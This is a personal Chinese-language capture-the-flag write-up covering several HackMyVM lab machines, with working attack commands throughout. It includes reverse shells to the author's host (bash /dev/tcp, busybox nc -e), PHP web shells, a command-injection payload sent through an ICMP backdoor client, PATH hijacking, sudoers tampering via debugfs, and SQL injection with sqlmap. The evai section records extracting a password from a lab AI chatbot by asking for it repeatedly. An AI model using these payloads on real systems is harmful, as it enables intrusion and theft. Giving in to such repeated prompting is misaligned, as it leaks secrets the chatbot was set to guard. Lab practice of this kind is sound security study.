渗透靶机😍

获取靶机地址：
https://maze-sec.com/
qq群：660930334

HackMyVM | Dashboard

bala

user

刚开始打嘛，什么都不会(例如网络)

https://blog.csdn.net/weixin_43623271/article/details/124145696
关于网络配置的

一开始进入靶机，发现需要账号密码登录，以为都是默认的，成sb了，人家都是渗透进去拿账号密码的

不说了，配好网络

https://blog.csdn.net/weixin_43623271/article/details/124145696?utm_source=miniapp_weixin

之后，先检查检查kali与渗透的靶机在不在同一网段

在kali里面输入ifconfig(和windows的ipconfig一样)
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.236
返回的是这个，就知道了渗透的靶机ip地址应该是192.168.3.x
sudo arp-scan -I eth0 192.168.3.0/24
探测局域网存活主机
发现
192.168.3.220   08:00:27:1b:c7:cb       PCS Systemtechnik GmbH
盲猜一下就是我们要攻击的靶机，知道我们要攻击的靶机了，扫描一下端口
全端口强制 TCP 扫描：
sudo nmap -Pn -p- -sT 192.168.3.220
返回
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc

发现是存在80端口访问一下：192.168.3.220:80

发现是关于IRC通信协议的网站，随便测试测试，再看看有没有信息泄露什么的，发现没有

在网上找找关于IRC基本命令_irc user register-CSDN博客

使用nc远程连接一下6667端口，是关于irc的服务器，连接之后发送 NICK 和 USER 命令注册用户

注册后，irc服务器会返回了fzer, /msg信息

nc 192.168.3.220 6667
(UNKNOWN) [192.168.3.220] 6667 (ircd) open
:irc.local NOTICE * :*** Looking up your hostname...
:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.3.236) instead.
NICK test123
USER test123 0 * :Test User
:irc.local 001 test123 :Welcome to the Localnet IRC Network test123!test123@192.168.3.236
:irc.local 002 test123 :Your host is irc.local, running version InspIRCd-3
:irc.local 003 test123 :This server was created 01:51:10 Nov 09 2025
:irc.local 004 test123 irc.local InspIRCd-3 iosw biklmnopstv :bklov
:irc.local 005 test123 AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:irc.local 005 test123 MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Localnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:irc.local 251 test123 :There are 1 users and 0 invisible on 1 servers
:irc.local 253 test123 1 :unknown connections
:irc.local 254 test123 4 :channels formed
:irc.local 255 test123 :I have 1 clients and 0 servers
:irc.local 265 test123 :Current local users: 1  Max: 1
:irc.local 266 test123 :Current global users: 1  Max: 1
:irc.local 375 test123 :irc.local message of the day
:irc.local 372 test123 :  _   _                 _____                              
:irc.local 372 test123 : | \ | | _____      __ |_   _|__  __ _ _ __ ___   ___ _ __ 
:irc.local 372 test123 : |  \| |/ _ \ \ /\ / /   | |/ _ \/ _` | '_ ` _ \ / _ \ '__|
:irc.local 372 test123 : | |\  |  __/\ V  V /    | |  __/ (_| | | | | | |  __/ |   
:irc.local 372 test123 : |_| \_|\___| \_/\_/     |_|\___|\__,_|_| |_| |_|\___|_|   
:irc.local 372 test123 : 
:irc.local 372 test123 : fzer
:irc.local 372 test123 : /msg
:irc.local 376 test123 :End of message of the day.
PING :irc.local

使用一些命令发现并没有暴露出来敏感信息

利用privmsg, notice与用户bala私聊
PRIVMSG bala :hello
:bala!bala@127.0.0.1 PRIVMSG test123 :未知命令，可用命令: getpassword, help, 
PRIVMSG bala :getpassword
:bala!bala@127.0.0.1 PRIVMSG test123 :密码: ai01ClGAXoYpeevwNMS1
:bala!bala@127.0.0.1 PRIVMSG test123 :此密码为敏感信息，请妥善保管
PING :irc.local
出来密码了

远程ssh连接
ssh bala@192.168.3.220 
不过密码不是bala的，之前在注册之后，irc服务器会返回了fzer，fzer应该也是一个用户
试试
ssh fzer@192.168.3.220
发现成功连上
fzer@Bala:~$ ls
doas.conf.bak  user.txt
fzer@Bala:~$ cat user.txt
flag{user-d3613deb71ef676e8883ffd60450262e}
出来第一个flag

root

现在只是用户，接下来要做到提权

sudo 权限枚举

sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
​
•    #1) Respect the privacy of others.
•    #2) Think before you type.
•    #3) With great power comes great responsibility.
​
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat
weechat?什么东西，搜搜看看
功能齐全的 IRC 插件：多服务器、代理支持、IPv6、SASL 身份验证、昵称列表、DCC 和许多其他功能。
试试能不能提权
sudo /usr/bin/weechat

在最后显示出来可以使用的插件
Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl,
python, relay, ruby, script, spell, trigger, xfer
发现存在exec，python什么的
看看exec可以吗
/exec -sh whoami
fzer
发现可以，直接
/exec -sh cp /bin/bash /home/fzer/bash1;chmod u+s /home/fzer/bash1
完成之后/exit退出
使用命令
ls -lah
发现存在
-rwsr-xr-x 1 root root 1.2M Nov  9 02:17 bash1
fzer@Bala:~$ ./bash1 -p
bash1-5.0# ls
bash1  doas.conf.bak  user.txt
bash1-5.0# id
uid=1000(fzer) gid=1000(fzer) euid=0(root) groups=1000(fzer)
bash1-5.0# whoami
root
提权拿下root权限

sysadmin

user

老样子，先扫描存活主机
sudo arp-scan -I eth0 192.168.3.0/24
发现 192.168.3.16
全端口强制 TCP 扫描：
sudo nmap -Pn -p- -sT 192.168.3.16
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
访问192.168.3.16
发现是一个上传并且编译执行.c的文件上传

gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out
-std=c11：指定使用 C11 标准进行编译
-nostdinc：不搜索标准系统头文件目录
-I/var/www/include：添加/var/www/include作为头文件搜索目录
-z execstack：允许栈执行，关闭栈保护机制
-fno-stack-protector：禁用栈保护机制（关闭缓冲区溢出检测）
-no-pie：不生成位置无关的可执行文件
test.c：源文件
-o a.out：指定输出的可执行文件名为 a.out

试试直接声明system，看能不能运行

int system(const char *command);
int main() {
    system("busybox nc 192.168.3.236 9427"); 
    return 0;
}

nc -lvp 9427
listening on [any] 9427 ...
192.168.3.16: inverse host lookup failed: Host name lookup failure
发现可以进行弹shell，不过连上一会就没有了，看看进行rce，然后在网上发现可以写入公钥

获取用户的名字

int system(const char *command);
int main() {
    system("echo $(whoami) | busybox nc 192.168.3.236 80");
    return 0;
}

python -m http:server 80 //启动Python HTTP 服务命令
返回得到echo
cat ~/.ssh/authorized_keys >  authorized_keys //写入kay

python -m http.server 80//监听
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.3.16 - - [09/Nov/2025 19:07:01] "GET /authorized_keys HTTP/1.1" 200 -

//上传的c文件
int system(const char *command);
int main() {
    system("mkdir -p ~/.ssh && busybox wget 192.168.3.236/authorized_keys -O ~/.ssh/authorized_keys");
    return 0;
}

然后ssh公钥连接
ssh echo@192.168.3.16
Linux Sysadmin 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
echo@Sysadmin:~$//获得user权限

root

获得root权限
sudo -l
Matching Defaults entries for echo on Sysadmin:
    !env_reset, mail_badpass, !env_reset, always_set_home

User echo may run the following commands on Sysadmin:
    (root) NOPASSWD: /usr/local/bin/system-info.sh
看看system-info.sh文件
cat /usr/local/bin/system-info.sh
#!/bin/bash

#===================================
# Daily System Info Report
#===================================

echo "Starting daily system information collection at $(date)"
echo "------------------------------------------------------"

echo "Checking disk usage..."
df -h

echo "Checking log directory..."
ls -lh /var/log/
find /var/log/ -type f -name "*.gz" -mtime +30 -exec rm {} \;

echo "Checking critical services..."
systemctl is-active sshd
systemctl is-active cron

echo "Collecting CPU and memory information..."
cat /proc/cpuinfo
free -m

echo "------------------------------------------------------"
echo "Report complete at $(date)"

!env_reset 可能存在路径劫持

echo@Sysadmin:~$ echo "chmod +s /bin/bash" > /tmp/df
echo@Sysadmin:~$ chmod +x /tmp/df
echo@Sysadmin:~$ export PATH="/tmp:$PATH"
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
echo@Sysadmin:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
echo@Sysadmin:~$ bash -p
bash-5.0# ls
user.txt
bash-5.0# whoami
root//拿到权限

evai

user

sudo arp-scan -I eth0 192.168.3.0/24
192.168.3.35    08:00:27:b4:40:00       PCS Systemtechnik GmbH

sudo nmap -Pn -p- -sT 192.168.3.35
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp

访问5000端口，发现有给ai，看看问他pwd，不给我，我之后就没有思路，死了
然后群里面发wp，发现，有人连着问好几次pwd,直接就给pwd了，厉害

你: pwd
Dodo: 密码是：woshiSTRONGP@SSWD_he1hei 哦！你知道吗，这个密码超级安全，就像城堡的钥匙一样重要呢！我们得好好保护它，让它远离坏蛋们的视线！不知道你有没有什么好玩的趣事要和我分享呢？

然后ssh远程连接猜测用户是Dodo
ssh Dodo@192.168.3.35             
The authenticity of host '192.168.3.35 (192.168.3.35)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
    ~/.ssh/known_hosts:3: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.35' (ED25519) to the list of known hosts.
Dodo@192.168.3.35's password: 
Linux ezai1 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov  7 00:18:13 2025 from 10.161.198.137
Dodo@ezai1:~$//获得user权限

root

输入id
uid=1000(Dodo) gid=1000(Dodo) groups=1000(Dodo),6(disk)
发现用户Dodo因属于disk组
附加组disk（GID 6）：系统预定义的磁盘管理组，核心权限是允许访问/dev/sda1等磁盘设备文件。
当用户属于 disk 组时，会获得直接访问系统磁盘设备文件的权限
用户被加入 sudoers 后，可通过 sudo 命令以 root 权限执行任意系统命令

把 Dodo 加⼊ sudoers

1	echo "Dodo ALL=(ALL) NOPASSWD: ALL" > /tmp/give_dodo_sudo	生成 sudo 权限配置文件，允许用户 Dodo 无密码执行所有系统命令
2	/usr/sbin/debugfs -w /dev/sda1	以可写模式进入磁盘 /dev/sda1 的 debugfs 交互界面（因用户属于 disk 组，可直接访问磁盘设备）
3	write /tmp/give_dodo_sudo /etc/sudoers.d/give_dodo_sudo	将临时配置文件写入系统关键目录 /etc/sudoers.d/，并获取文件的 inode 编号（26）
4	ln <26> /etc/sudoers.d/give_dodo_sudo	建立文件名与 inode 的链接，确保文件在系统中可被识别
5	sif <26> i_mode 0100440	设置文件权限为 0440（仅 root 可写，其他用户可读，符合 sudo 配置文件的权限规范）
6	sif <26> i_uid 0、sif <26> i_gid 0	设置文件所有者和组为 root（UID、GID 均为 0），保证配置文件的系统级权限合法性
7	quit	退出 debugfs 交互界面

id
uid=0(root) gid=0(root) groups=0(root)  拿到root权限

baby版

因为是baby所以就简单讲解一下了，重点是怎么sudo提权的

babycms

常规扫描发现80和22端口
dirsearch扫描一下
dirb http://babycms.dsz/ -X .txt,.php,.zip
发现admin目录和setup.txt
pass:dyxBCEjovrUJa84sV03Q

进入主页发现用户的名字是root
/admin
root:dyxBCEjovrUJa84sV03Q

web渗透

打开helloworld插件，编辑index.php文件

头部添加
<?php
phpinfo();
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.3.236/2332 0>&1'");

访问主页发现出现phpinfo()

kali:
nc -lvvp 2332
listening on [any] 2332 ...
192.168.3.146: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.146] 47314
bash: cannot set terminal process group (458): Inappropriate ioctl for device
bash: no job control in this shell
www-data@BabyCMS:/var/www/html$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null

/usr/bin/script -qc /bin/bash /dev/null //使shell稳定，可以进行二级目录操作和交互shell(比如之后的mysql连接)
https://www.bilibili.com/video/BV1qp4y1Z7Pv/?spm_id_from=333.1387.search.video_card.click
学习资料

查看/var/www/html 下面的config.inc.php
发现mysql数据库
'user' => 'pagekit_user',
'password' => 'your_secure_password',

远程连接
www-data@BabyCMS:/$ mysql -upagekit_user -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 54225
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| pagekit |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use pagekit;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [pagekit]> show tables;
+-----------------------+
| Tables_in_pagekit |
+-----------------------+
| typecho_comments |
| typecho_contents |
| typecho_fields |
| typecho_metas |
| typecho_options |
| typecho_relationships |
| typecho_userlist |
| typecho_users |
+-----------------------+
8 rows in set (0.000 sec)
MariaDB [pagekit]> select * from typecho_userlist;
+----+--------+----------------------+
| id | name | pass |
+----+--------+----------------------+
| 1 | caigou | dRfGtYhUjIkOlPqAeRtY |
| 2 | user1 | aBcDeFgHiJkLmNoPqRsT |
| 3 | user2 | cNNloFLE88YBIP4ZJfcy |
| 4 | user3 | xYzAbCdEfGhIjKlMnOpQ |
| 5 | user4 | pLmOkNjIbHvGcFxDrEsW |
| 6 | user5 | wVxYzAbCdEfGhIjKlMnO |
| 7 | user6 | sTrUvWxYzAbCdEfGhIjK |
| 8 | user7 | qWeRtYuIoPaSdFgHjKlZ |
| 9 | user8 | mNbVcXzAsDfGhJkLpOqR |
| 10 | user9 | kJiHgFdSaPqOwNeMtBuV |
+----+--------+----------------------+
发现用户是caigou
爆破密码
cNNloFLE88YBIP4ZJfcy

root提权

拿到caigou后并没有发现常规提权路径可⽤，爆破上面的密码，发现密码还是cNNloFLE88YBIP4ZJfcy🤔
拿到root权限

babypass

弄好靶机之后
使用fscan扫描一下
curl一下主页 发现提示
hello world
<!-- tms -->
<!-- Do not use same password in different account.  -->

信息搜集一下发现tms是一个旅游管理系统
dir扫一下发现README.md这个文件
里面存在：
Username : admin
Password : Test@123
进入主页发现有的点不动，就试试远程ssh连接一下发现成功连接上去

id
uid=1002(admin) gid=1002(admin) groups=1002(admin)
admin@BabyPass:~$ sudo -l
[sudo] password for admin: 
Sorry, user admin may not run sudo on BabyPass

然后查看/var/www/html/tms/includes/config.php文件

define('DB_HOST','localhost');
define('DB_USER','tms_user');
define('DB_PASS','secure_password');
define('DB_NAME','tms');
// Establish database connection.

mysql -utms_user -psecure_password
mysql连接一下
查看tms那个库，接着查看下面的表
| Tables_in_tms   |
+-----------------+
| admin           |
| tblbooking      |
| tblenquiry      |
| tblissues       |
| tblpages        |
| tbltourpackages |
| tblusers        |
+-----------------+

|  1 | Manju Srivatav | 4456464654   | manju@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:20 | NULL                |
|  2 | Kishan         | 9871987979   | kishan@gmail.com | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:56 | NULL                |
|  3 | Salvi Chandra  | 1398756416   | salvi@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:20 | NULL                |
|  4 | Abir           | 4789756456   | abir@gmail.com   | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:38 | NULL                |
|  5 | Test           | 1987894654   | anuj@gmail.com   | f925916e2754e5e03f75dd58a5733251 | 2020-07-08 02:35:06 | 2021-05-11 00:37:41 |
|  6 | root           | 123456789    | root@gmail.com   | fd50619cd7026f0f32272f77f4da6e92

https://toolshu.com/crackmd5  https://hashes.com/zh/decrypt/hash https://somd5.com md5解密网站
fd50619cd7026f0f32272f77f4da6e92 -> Root@456

babyshell

fscan扫一下靶机发现80和22端口
dir扫一下发现backup.zip ，解压发现icmp.py
#!/usr/bin/env python3
import os
import sys
import socket
import struct
import time
import subprocess
import signal
import threading
from scapy.all import ICMP, IP, Raw, send, sniff, Ether
import base64

TRIGGER_SEQUENCE = b"Mazesec"
LISTEN_INTERFACE = "enp0s3"
SERVER_IP = "0.0.0.0"


class ICMPServer:
    def __init__(self):
        self.running = True
        self.client_ips = {}

    def signal_handler(self, sig, frame):
        print("\n[!] Stopping server...")
        self.running = False
        sys.exit(0)

    def execute_command_as_user(self, command, uid=1000, timeout=30):

    def parse_icmp_command(self, packet_data):
        try:
            trigger_len = len(TRIGGER_SEQUENCE)
            if len(packet_data) < trigger_len + 4:
                return None

            if packet_data[:trigger_len] != TRIGGER_SEQUENCE:
                return None

            cmd_len = struct.unpack('>I', packet_data[trigger_len:trigger_len + 4])[0]

            if cmd_len <= 0 or cmd_len > 4096:
                return None

            if len(packet_data) < trigger_len + 4 + cmd_len:
                return None

            command = packet_data[trigger_len + 4:trigger_len + 4 + cmd_len].decode('utf-8', errors='ignore')
            return command

        except Exception as e:
            print(f"[-] Parse error: {e}")
            return None

    def create_icmp_response(self, original_packet, result):
        try:
            result_bytes = result.encode('utf-8') if isinstance(result, str) else result
            result_len = len(result_bytes)
            trigger_len = len(TRIGGER_SEQUENCE)

            payload = TRIGGER_SEQUENCE
            payload += struct.pack('>I', result_len)
            payload += result_bytes

            response = IP(dst=original_packet[IP].src) / \
                       ICMP(type=0, id=original_packet[ICMP].id, seq=original_packet[ICMP].seq) / \
                       Raw(load=payload)

            return response

        except Exception as e:
            print(f"[-] Response creation error: {e}")
            return None

    def handle_icmp_packet(self, packet):
        if not self.running:
            return

        try:
            if packet.haslayer(ICMP) and packet[ICMP].type == 8:
                src_ip = packet[IP].src

                if packet.haslayer(Raw):
                    icmp_data = bytes(packet[Raw].load)

                    command = self.parse_icmp_command(icmp_data)

                    if command:
                        print(f"[+] Command from {src_ip}: {command}")

                        # 以UID 1000执行命令
                        result = self.execute_command_as_user(command, 1000)
                        print(f"[+] Result length: {len(result)}")

                        # 以root权限发送ICMP响应
                        response = self.create_icmp_response(packet, result)
                        if response:
                            send(response, verbose=0)
                            print(f"[+] Response sent to {src_ip}")

                        self.client_ips[src_ip] = time.time()

        except Exception as e:
            print(f"[-] Packet handling error: {e}")

    def start_server(self):

        signal.signal(signal.SIGINT, self.signal_handler)
        signal.signal(signal.SIGTERM, self.signal_handler)


def main():
    server = ICMPServer()
    server.start_server()


if __name__ == "__main__":
    main()

拷打ai得出脚本
#!/usr/bin/env python3
# icmp_client.py
import struct
import time
from scapy.all import IP, ICMP, Raw, send, sniff

TRIGGER = b"Mazesec"
TARGET = "192.168.3.183"   # <-- 改为目标 IP
TIMEOUT = 5

def make_payload(cmd: str) -> bytes:
    b = cmd.encode('utf-8')
    return TRIGGER + struct.pack('>I', len(b)) + b

def send_command_and_wait(target_ip: str, cmd: str, timeout: int = TIMEOUT):
    payload = make_payload(cmd)
    pkt = IP(dst=target_ip) / ICMP(type=8, id=0x1234, seq=0x1) / Raw(load=payload)
    send(pkt, verbose=0)
    # 监听目标发回的 ICMP Echo Reply（type 0）并以 TRIGGER 开头的包
    def filter_fn(x):
        try:
            return x.haslayer(ICMP) and x[ICMP].type == 0 and x[IP].src == target_ip and x.haslayer(Raw) and bytes(x[Raw].load).startswith(TRIGGER)
        except Exception:
            return False

    pkts = sniff(lfilter=filter_fn, timeout=timeout, count=1)
    if not pkts:
        print("[!] No reply")
        return None
    load = bytes(pkts[0][Raw].load)
    # parse: skip TRIGGER, read 4-byte length, then data
    try:
        off = len(TRIGGER)
        out_len = struct.unpack('>I', load[off:off+4])[0]
        data = load[off+4:off+4+out_len]
        return data.decode('utf-8', errors='ignore')
    except Exception as e:
        print("[!] Parse error:", e)
        return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        print("Usage: sudo python icmp_client.py <target_ip> <command>")
        sys.exit(1)
    tgt = sys.argv[1]
    cmd = " ".join(sys.argv[2:])
    print(f"[+] Sending command to {tgt}: {cmd}")
    out = send_command_and_wait(tgt, cmd, timeout=8)
    if out is None:
        print("[!] No response or parse failure")
    else:
        print("----- RESPONSE BEGIN -----")
        print(out)
        print("----- RESPONSE END -----")

sudo python3 icmp_client.py 192.168.3.183 "whoami"
回显id为: zero，不过老是断开什么的，有时候命令run不了，尝试反弹shell
sudo python3 icmp_client.py 192.168.3.183 "busybox nc 192.168.3.236 4444 -e /bin/sh"
[+] Sending command to 192.168.3.183: busybox nc 192.168.3.236 4444 -e /bin/sh
[!] No reply
[!] No response or parse failure
发现确实报错不过也确实反弹成功了🤡

nc -lvvp 4444
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
直接读/home/zero/user.txt
使用上面的权限维持方法：
/usr/bin/script -qc /bin/bash /dev/null
进入交互页面查看完整的py
cat icmp.py
![vmware_CFf9ubKoLM](HackmyVm-babyshell/2025-11/vmware_CFf9ubKoLM.png)
def execute_command_as_user(self, command, uid=1000, timeout=30):
try:
# 使用sudo以指定用户执行命令
result = subprocess.check_output(
f"sudo -u zero bash -c '{command}'",
shell=True,
stderr=subprocess.STDOUT,
timeout=timeout,
text=True
)
return result
except subprocess.TimeoutExpired:
return f"Error: Command timeout"
except subprocess.CalledProcessError as e:
return f"Error: Exit code {e.returncode}\nOutput: {e.output}"
except Exception as e:
return f"Error: {str(e)}"//(就放比较重要的了)
发现命令可以拼接执行并且是sudo
直接
sudo python3 icmp_client.py 192.168.3.183 "';bash -c 'bash -i >&/dev/tcp/192.168.3.236/2333 0>&1''"

nc -lvvp 2333
listening on [any] 2333 ...
192.168.3.183: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.183] 44174
bash: cannot set terminal process group (356): Inappropriate ioctl for device
bash: no job control in this shell
root@BabyShell:/# //拿下root

babyauth

打开该靶机，先fscan扫一下，dirsearch扫一下

发现一个登录框：http://192.168.3.237/login.php
登录框有：sql注入漏洞,xss什么的一些漏洞，因为dir就扫出来这一个，试试爆破登录和漏洞测试，然后发现爆破成功
admin/iloveyou
http://192.168.3.237/admin.php?search=1
http://192.168.3.237/admin.php?search=1%27+or+1%3D1%23 //1' or 1=1#
发现存在sql注入漏洞，使用sqlmap工具直接扫：
 python sqlmap.py -u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" --dbs --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
 available databases [2]:
[*] information_schema
[*] target_db

-u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" -D target_db --tables --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
Database: target_db
[3 tables]
+---------+
| path    |
| credit  |
| product |
+---------+

-u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" -D target_db -T credit --schema --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
Database: target_db
Table: path
[1 column]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| secret_path | varchar(255) |
+-------------+--------------+

Database: target_db
Table: credit
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| username | varchar(50) |
+----------+-------------+
Table: credit
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| ff5e66b76340c5636aa40e7c6a46628f | lingmj |
+----------------------------------+----------+
ff5e66b76340c5636aa40e7c6a46628f -md5> xiaomi（不过就是使用这个登录不上去）


反正就是一系列的扫
Table: path
+-----------------------------------+
| secret_path |
+-----------------------------------+
| /var/www/html/SsssssssuperSecret/ |
+-----------------------------------+
发现这个目录http://192.168.3.237/SsssssssuperSecret/ 再dir一下发现东西:user.txt shell.php /index.html
进入shell.php 这个是一个模拟终端
busybox nc 192.168.3.236 4444 -e /bin/bash

nc -lvvp 4444     
listening on [any] 4444 ...
id
192.168.3.237: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.237] 54840
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null //稳定shell 拿下user权限
尝试su -root
发现需要Verification code:
接着查看/opt目录下面，检查是不是存放定制工具、配置文件或漏洞相关程序（如提权脚本、服务配置）
在系统中发现 Google Authenticator 配置文件：
ls -al /opt
ls -al /opt
total 12
drwxr-xr-x  2 root root 4096 Nov  6 06:43 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
-r--r--r--  1 root root  141 Nov  6 06:43 .google_authenticator
cat /opt/.goo*
WETZMYJW52CMYLCZIX4EJ4HACQ
" RATE_LIMIT 3 30 1762429231 1762429249
" WINDOW_SIZE 17
" TOTP_AUTH
66503223
88483022
74570865
29377535
29891329
获取 TOTP 密钥：WETZMYJW52CMYLCZIX4EJ4HACQ
使用 oathtool 生成有效的验证码：oathtool -b --totp "WETZMYJW52CMYLCZIX4EJ4HACQ"  -> 549616
输入code 密码就是xiaomi 拿下root权限

Aria

fscan扫描加nmap
sudo nmap -Pn -p- -sT 192.168.3.83
./fscan -h 192.168.3.83
发现
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
访问80端口，并且nc连接1337

└─# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Log file not found.
--- End of Log ---

访问80端口并且dir扫描发现upload.php，文件上传
GIF89a
<?= exec($_GET['0']); ?>
然后再次nc连接
└─# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Sun 16 Nov 2025 04:12:57 AM EST: New file created: /var/www/html/uploads/756dfdd36d83c0bf213fb615014f6b2b.gif
访问该网站，发现连上成功
?0=busybox nc 192.168.56.247 9427 -e /bin/bash //反弹shell
/usr/bin/script -qc /bin/bash /dev/null//权限维持

cat -A /home/aria/user.txt
flag{user-d13adadc6bbc1391394a5198cba2d1d7}$
M-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^L

发现是零宽度 / 控制字符
